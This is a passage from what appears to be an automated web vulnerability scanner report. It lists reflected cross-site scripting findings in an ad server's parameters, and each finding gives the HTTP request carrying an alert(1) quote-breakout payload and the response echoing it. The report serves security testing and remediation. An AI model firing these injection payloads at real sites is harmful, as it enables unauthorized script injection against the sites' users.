Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:56 GMT
Expires: Mon, 15 Nov 2010 07:22:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
v8/3a53/7/12b/%2a/a%3B229262899%3B5-0%3B0%3B53186448%3B3454-728/90%3B38213471/38231228/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoea110'-alert(1)-'4a1a8ea4008&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d3
...[SNIP]...

4.67. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a35e4"-alert(1)-"75f9009f3b was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotoa35e4"-alert(1)-"75f9009f3b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:17:52 GMT
Expires: Mon, 15 Nov 2010 07:22:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6108

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
v8/3a53/7/12a/%2a/d%3B229262899%3B4-0%3B0%3B53186448%3B3454-728/90%3B38212591/38230348/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa35e4"-alert(1)-"75f9009f3b&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d3
...[SNIP]...

4.68. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1e6e"-alert(1)-"4b69fadcfd6 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2b1e6e"-alert(1)-"4b69fadcfd6&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2b1e6e"-alert(1)-"4b69fadcfd6&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcal
...[SNIP]...

4.69. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb391'-alert(1)-'9f92add2e4d was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2eb391'-alert(1)-'9f92add2e4d&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6428

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2eb391'-alert(1)-'9f92add2e4d&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.70. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b5a0"-alert(1)-"672f1f4bd was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt86b5a0"-alert(1)-"672f1f4bd&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6420

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt86b5a0"-alert(1)-"672f1f4bd&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

4.71. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 983a0'-alert(1)-'9af9ccbb6b9 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8983a0'-alert(1)-'9af9ccbb6b9&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8983a0'-alert(1)-'9af9ccbb6b9&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.72. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5467f'-alert(1)-'9ed5241a6ce was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=5467f'-alert(1)-'9ed5241a6ce HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=5467f'-alert(1)-'9ed5241a6cehttp://www.xc4.is\">
...[SNIP]...

4.73. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2a03"-alert(1)-"022abc0060 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=c2a03"-alert(1)-"022abc0060 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6421

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:35 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=c2a03"-alert(1)-"022abc0060http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH
...[SNIP]...

4.74. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c453b'-alert(1)-'81b54708230 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&c453b'-alert(1)-'81b54708230=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6440

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:06:42 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&c453b'-alert(1)-'81b54708230=1http://www.xc4.is\">
...[SNIP]...

4.75. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ab1"-alert(1)-"63e4c9f6674 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&59ab1"-alert(1)-"63e4c9f6674=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6440

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:59 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=&59ab1"-alert(1)-"63e4c9f6674=1http://www.xc4.is");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var win
...[SNIP]...

4.76. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8210f'-alert(1)-'afe3257d6a1 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory8210f'-alert(1)-'afe3257d6a1&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
02%3B4252-336/280%3B39025850/39043607/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146535_247381%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory8210f'-alert(1)-'afe3257d6a1&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto=http://www.xc4.is\">
...[SNIP]...

4.77. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81584"-alert(1)-"f1713590b03 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory81584"-alert(1)-"f1713590b03&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6426

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 14:07:17 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
